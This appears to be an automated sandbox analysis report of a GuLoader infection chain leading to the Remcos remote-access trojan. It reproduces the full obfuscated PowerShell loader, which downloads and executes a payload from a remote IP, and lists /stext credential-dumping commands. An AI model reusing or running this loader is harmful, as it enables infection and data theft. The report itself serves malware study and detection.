'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;"
                Imagebase:0x7ff7be880000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:01:12:57
                Start date:05/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:01:12:59
                Start date:05/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Imagebase:0x7ff6d12e0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:01:13:07
                Start date:05/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;"
                Imagebase:0xbd0000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2447272423.00000000089C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2442003706.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2447423096.000000000B13D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:01:13:08
                Start date:05/07/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:01:13:27
                Start date:05/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0x150000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:false

                General

                Target ID:11
                Start time:01:13:48
                Start date:05/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
                Imagebase:0x150000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:12
                Start time:01:13:48
                Start date:05/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Imagebase:0x150000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:13
                Start time:01:13:48
                Start date:05/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Imagebase:0x150000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:14
                Start time:01:13:48
                Start date:05/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
                Imagebase:0x150000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Executed Functions

                  Function 00007FF848F0B0F6 Relevance: .5, Instructions: 474COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2724190341.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2c19948d541e92536f033e286ae84b0dd259b10faafb6e7c2c8f7ce71b5b1996
                  • Instruction ID: 2afff9080886aa8cd207647c160216278eea3f441e78e8c5ebf3336a733d7821
                  • Opcode Fuzzy Hash: 2c19948d541e92536f033e286ae84b0dd259b10faafb6e7c2c8f7ce71b5b1996
                  • Instruction Fuzzy Hash: 67F1B33091CA8D8FEBA8EF28C8557E937E1FF55350F04426EE84DC7295DB38A9458B81
                  Function 00007FF848F0BEA2 Relevance: .5, Instructions: 459COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2724190341.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e567d0effd1834ad48b0c08d4b5c9002875cc5fa5a9149e33b3573277e014884
                  • Instruction ID: aca1364d927e022c4636c3582b92b52c27ebec82842ee5e782918ed5db604648
                  • Opcode Fuzzy Hash: e567d0effd1834ad48b0c08d4b5c9002875cc5fa5a9149e33b3573277e014884
                  • Instruction Fuzzy Hash: 39E1D13090DA8D8FEBA8EF28C8557E937E1FF55351F14422AD84DC7291EB78A8448B81
                  Function 00007FF848FD6609 Relevance: .5, Instructions: 464COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2725311731.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a2cf5bdc9b0c92796d42cb8461dc99c3ef1eb230709e737c04fd14b772d145c
                  • Instruction ID: 20f2bd9fdf975b8532fa97440ff4b5924a2e8c0e39237b0543de7b6d91dbef0d
                  • Opcode Fuzzy Hash: 9a2cf5bdc9b0c92796d42cb8461dc99c3ef1eb230709e737c04fd14b772d145c
                  • Instruction Fuzzy Hash: A8E13931D0DA8A8FE795EF2848656B87BE1EF59360F1801BAD10EC71D3DF2C98058785
                  Function 00007FF848F04A1A Relevance: .4, Instructions: 441COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2724190341.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef3cf48b2414d2871ab2fc7e326582643aa4b01b6a01c270eeffb308a893c316
                  • Instruction ID: c5b65b2b43a8de7e19f908e122438213a04d6cb1a49184ad78f809ba36905a03
                  • Opcode Fuzzy Hash: ef3cf48b2414d2871ab2fc7e326582643aa4b01b6a01c270eeffb308a893c316
                  • Instruction Fuzzy Hash: 75E1B031A0C94E8FDB94EF1CD455AE9BBB1FFA9354F1441BAD409C7286DB24AC82C784
                  Function 00007FF848F045D3 Relevance: .2, Instructions: 216COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2724190341.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e06e783186445e1438b9d5258fa72b223b5cc537891e575a6173f30c89fae851
                  • Instruction ID: 6c7695a80be7bee6283d1a0e03b31522085accd180ad2714057072413911e99c
                  • Opcode Fuzzy Hash: e06e783186445e1438b9d5258fa72b223b5cc537891e575a6173f30c89fae851
                  • Instruction Fuzzy Hash: EC515A3660E6855FD709B72CA4515E57BA0EFD2375B0401BBD188CF093EA19688BC3A5
                  Function 00007FF848FD67A7 Relevance: .2, Instructions: 201COMMON
                  Download Yara Rule
                  Memory Dump Source
